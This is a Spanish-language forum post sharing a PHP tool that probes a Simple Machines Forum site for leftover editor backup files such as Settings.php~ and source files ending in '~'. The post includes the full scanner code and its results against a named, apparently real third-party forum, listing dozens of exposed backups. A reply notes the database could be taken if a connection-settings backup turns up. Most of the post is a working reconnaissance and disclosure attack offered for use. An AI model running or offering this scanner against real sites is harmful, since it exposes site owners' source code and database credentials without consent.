Esta tool no se si sera muy util pero por las dudas me tome el tiempo de hacerla, mas que nada sirve para ver los archivos temporales que fueron creados cuando se instalan nuevos modulos en el sistema de smf. Les dejo el codigo.
<html>
<title>SMF Source Code Disclosure Seeker</title>
<style type="text/css">
body{
background: #000;
color: #FFF;
}
a:visited{
color:#FFF;
text-decoration: none;
}
a:link{
color:#FFF;
text-decoration: none;
}
a:hover{
color:#FF0000;
text-decoration: blink;
}
input,option{
font-family: verdana, sans-serif;
font-size: 16pt;
border: gray 2px solid;
}
#links{
margin:0 auto;
width:860px;
border-color: #E8E8E8;
text-align: right;
}
</style>
<body>
<div id="links">
<center>
<img src="http://www.0x3a.com.ar/img/logo.png"/><br/>
<form action ="" method="post">
URL : <input type ="text" name="site" size="50"/>
<input type = "submit" value="Test!" />
</form>
<?php
/**
*
*
* @author Daniel Godoy
* @copyright 2011
* @Site www.0x3a.com.ar www.remoteexecution.com.ar www.delincuentedital.com.ar
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
*
**/
set_time_limit(0);
$site = $_POST['site'];
$list = array('index.php~', 'Settings.php~','Settings_bak.php~','/Sources/Admin.php~','/Sources/BoardIndex.php~','/Sources/Calendar.php~','/Sources/Display.php~',
'/Sources/Errors.php~','/Sources/DumpDatabase.php~','/Sources/Help.php~','/Sources/index.php~','/Sources/Karma.php~','/Sources/Load.php~',
'/Sources/LockTopic.php~','/Sources/LogInOut.php~','/Sources/ManageAttachments.php~','/Sources/ManageBans.php~','/Sources/ManageBoards.php~',
'/Sources/ManageCalendar.php~','/Sources/ManageErrors.php~','/Sources/ManageMembergroups.php~','/Sources/ManageMembers.php~',
'/Sources/ManageNews.php~','/Sources/ManagePermissions.php~','/Sources/ManagePosts.php~','/Sources/ManageRegistration.php~',
'/Sources/ManageSearch.php~','/Sources/ManageServer.php~','/Sources/ManageShoutbox.php~','/Sources/ManageSmileys.php~','/Sources/Memberlist.php~',
'/Sources/MessageIndex.php~','/Sources/Memberlist.php~','/Sources/MessageIndex.php~','/Sources/Modlog.php~','/Sources/ModSettings.php~',
'/Sources/MoveTopic.php~','/Sources/News.php~','/Sources/Notify.php~','/Sources/PackageGet.php~','/Sources/Packages.php~','/Sources/PersonalMessage.php~',
'/Sources/Poll.php~','/Sources/Post.php~','/Sources/Printpage.php~','/Sources/Profile.php~','/Sources/QueryString.php~','/Sources/Recent.php~',
'/Sources/Register.php~','/Sources/Reminder.php~','/Sources/RemoveTopic.php~','/Sources/RepairBoards.php~','/Sources/Reports.php~','/Sources/Search.php~',
'/Sources/Security.php~','/Sources/SendTopic.php~','/Sources/Shoutbox.php~','/Sources/SplitTopics.php~','/Sources/Stats.php~',
'/Sources/Subs-Auth.php~','/Sources/Subs-Boards.php~','/Sources/Subs-Charset.php~','/Sources/Subs-Compat.php~','/Sources/Subs-Graphics.php~',
'/Sources/Subs-Members.php~','/Sources/Subs-Package.php~','/Sources/Subs-Post.php~','/Sources/Subs-Shoutbox.php~','/Sources/Subs-Sound.php~',
'/Sources/Subs.php~','/Sources/Themes.php~','/Sources/ViewQuery.php~','/Sources/Who.php~','/Themes/default/Admin.template.php~',
'/Themes/default/BoardIndex.template.php~','/Themes/default/Calendar.template.php~','/Themes/default/Combat.template.php~',
'/Themes/default/Display.template.php~','/Themes/default/Errors.template.php~','/Themes/default/Help.template.php~','/Themes/default/index.php~',
'/Themes/default/index.template.php~','/Themes/default/Login.template.php~','/Themes/default/ManageAttachments.template.php~',
'/Themes/default/ManageBans.template.php~','/Themes/default/ManageBoards.template.php~','/Themes/default/ManageCalendar.template.php~',
'/Themes/default/ManageMembergroups.template.php~','/Themes/default/ManageMembers.template.php~','/Themes/default/ManageNews.template.php~',
'/Themes/default/ManagePermissions.template.php~','/Themes/default/ManageSearch.template.php~','/Themes/default/ManageShoutbox.template.php~',
'/Themes/default/ManageSmileys.template.php~','/Themes/default/Memberlist.template.php~','/Themes/default/MessageIndex.template.php~',
'/Themes/default/Modlog.template.php~','/Themes/default/MoveTopic.template.php~','/Themes/default/Notify.template.php~',
'/Themes/default/Packages.template.php~','/Themes/default/PersonalMessage.template.php~','/Themes/default/Poll.template.php~',
'/Themes/default/Post.template.php~','/Themes/default/Printpage.template.php~','/Themes/default/Profile.template.php~',
'/Themes/default/Recent.template.php~','/Themes/default/Register.template.php~','/Themes/default/Reminder.template.php~',
'/Themes/default/Reports.template.php~','/Themes/default/Search.template.php~','/Themes/default/SendTopic.template.php~','/Themes/default/Settings.template.php~',
'/Themes/default/Shoutbox.template.php~','/Themes/default/SplitTopics.template.php~','/Themes/default/Stats.template.php~',
'/Themes/default/Themes.template.php~','/Themes/default/Who.template.php~','/Themes/default/Wireless.template.php~','/Themes/default/Xml.template.php~',
'/Themes/default/languages/Admin.english.php~','/Themes/default/languages/Admin.spanish_latin.php~','/Themes/default/languages/Errors.english.php~',
'/Themes/default/languages/Errors.spanish_latin.php~','/Themes/default/languages/Help.english.php~','/Themes/default/languages/Help.spanish_latin.php~',
'/Themes/default/languages/index.english.php~','/Themes/default/languages/index.spanish_latin.php~','/Themes/default/languages/Install.english.php~',
'/Themes/default/languages/Install.spanish_latin.php~','/Themes/default/languages/Login.english.php~','/Themes/default/languages/Login.spanish_latin.php~',
'/Themes/default/languages/ManageBoards.english.php~','/Themes/default/languages/ManageBoards.spanish_latin.php~','/Themes/default/languages/ManageCalendar.english.php~',
'/Themes/default/languages/ManageCalendar.spanish_latin.php~','/Themes/default/languages/ManageMembers.english.php~','/Themes/default/languages/ManageMembers.spanish_latin.php~',
'/Themes/default/languages/ManagePermissions.english.php~','/Themes/default/languages/ManagePermissions.spanish_latin.php~','/Themes/default/languages/ManageSmileys.english.php~',
'/Themes/default/languages/ManageSmileys.spanish_latin.php~','/Themes/default/languages/Manual.english.php~','/Themes/default/languages/Manual.spanish_latin.php~',
'/Themes/default/languages/Modifications.english.php~','/Themes/default/languages/ManageSmileys.spanish_latin.php~','/Themes/default/languages/Manual.english.php~',
'/Themes/default/languages/Manual.spanish_latin.php~','/Themes/default/languages/Modifications.english.php~','/Themes/default/languages/Modifications.spanish_latin.php~',
'/Themes/default/languages/ModSettings.english.php~','/Themes/default/languages/ModSettings.spanish_latin.php~','/Themes/default/languages/Packages.english.php~',
'/Themes/default/languages/Packages.spanish_latin.php~','/Themes/default/languages/PersonalMessage.english.php~','/Themes/default/languages/PersonalMessage.spanish_latin.php~',
'/Themes/default/languages/Post.english.php~','/Themes/default/languages/Post.spanish_latin.php~','/Themes/default/languages/Profile.english.php~',
'/Themes/default/languages/Profile.spanish_latin.php~','/Themes/default/languages/Reports.english.php~','/Themes/default/languages/Reports.spanish_latin.php~',
'/Themes/default/languages/Search.english.php~','/Themes/default/languages/Search.spanish_latin.php~','/Themes/default/languages/Settings.english.php~',
'/Themes/default/languages/Settings.spanish_latin.php~','/Themes/default/languages/Shoutbox.english.php~','/Themes/default/languages/Stats.english.php~',
'/Themes/default/languages/Stats.spanish_latin.php~','/Themes/default/languages/Themes.english.php~','/Themes/default/languages/Themes.spanish_latin.php~',
'/Themes/default/languages/Who.english.php~','/Themes/default/languages/Who.spanish_latin.php~','/Themes/default/languages/Wireless.english.php~',
'/Themes/default/languages/Wireless.spanish_latin.php~',
);
if(isset($site)){
foreach($list as $path => $test) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $site.$test);
$result = curl_exec($ch);
curl_close($ch);
if (preg_match("/200 OK/", $result)){
flush();
echo '<br/>[!] <a href="'.$site.$test.'" target="_blank">'.$site.$test.'</a>';
ob_flush();
}
}
}
?>
</center>
</div>
</body>
</html>
Ejemplo obtenido al correr el script.
[!] http://forums.fireworknk.com/index.php~
[!] http://forums.fireworknk.com//Sources/BoardIndex.php~
[!] http://forums.fireworknk.com//Sources/Load.php~
[!] http://forums.fireworknk.com//Sources/ManageBoards.php~
[!] http://forums.fireworknk.com//Sources/ManagePermissions.php~
[!] http://forums.fireworknk.com//Sources/ManagePosts.php~
[!] http://forums.fireworknk.com//Sources/ManageRegistration.php~
[!] http://forums.fireworknk.com//Sources/ManageSearch.php~
[!] http://forums.fireworknk.com//Sources/Modlog.php~
[!] http://forums.fireworknk.com//Sources/ModSettings.php~
[!] http://forums.fireworknk.com//Sources/PersonalMessage.php~
[!] http://forums.fireworknk.com//Sources/Post.php~
[!] http://forums.fireworknk.com//Sources/Profile.php~
[!] http://forums.fireworknk.com//Sources/Recent.php~
[!] http://forums.fireworknk.com//Sources/Register.php~
[!] http://forums.fireworknk.com//Sources/Search.php~
[!] http://forums.fireworknk.com//Sources/Subs-Boards.php~
[!] http://forums.fireworknk.com//Sources/Subs-Graphics.php~
[!] http://forums.fireworknk.com//Sources/Subs-Members.php~
[!] http://forums.fireworknk.com//Sources/Subs.php~
[!] http://forums.fireworknk.com//Sources/Who.php~
[!] http://forums.fireworknk.com//Themes/default/Admin.template.php~
[!] http://forums.fireworknk.com//Themes/default/BoardIndex.template.php~
[!] http://forums.fireworknk.com//Themes/default/Display.template.php~
[!] http://forums.fireworknk.com//Themes/default/index.template.php~
[!] http://forums.fireworknk.com//Themes/default/ManageBoards.template.php~
[!] http://forums.fireworknk.com//Themes/default/ManageSearch.template.php~
[!] http://forums.fireworknk.com//Themes/default/Modlog.template.php~
[!] http://forums.fireworknk.com//Themes/default/PersonalMessage.template.php~
[!] http://forums.fireworknk.com//Themes/default/Post.template.php~
[!] http://forums.fireworknk.com//Themes/default/Profile.template.php~
[!] http://forums.fireworknk.com//Themes/default/Register.template.php~
[!] http://forums.fireworknk.com//Themes/default/Search.template.php~
[!] http://forums.fireworknk.com//Themes/default/languages/Errors.english.php~
[!] http://forums.fireworknk.com//Themes/default/languages/Help.english.php~
[!] http://forums.fireworknk.com//Themes/default/languages/Login.english.php~
[!] http://forums.fireworknk.com//Themes/default/languages/Modifications.english.php~
[!] http://forums.fireworknk.com//Themes/default/languages/Modifications.english.php~
[!] http://forums.fireworknk.com//Themes/default/languages/ModSettings.english.php~
[!] http://forums.fireworknk.com//Themes/default/languages/Who.english.php~
útil lo es, otra cosa es que sea es que sea eficaz a la hora de encontrar sacar datos útiles, en este caso como mucho se sacará la bd siempre y cuando esté el archivo temporal de la conexión.
Gracias por aportar ;)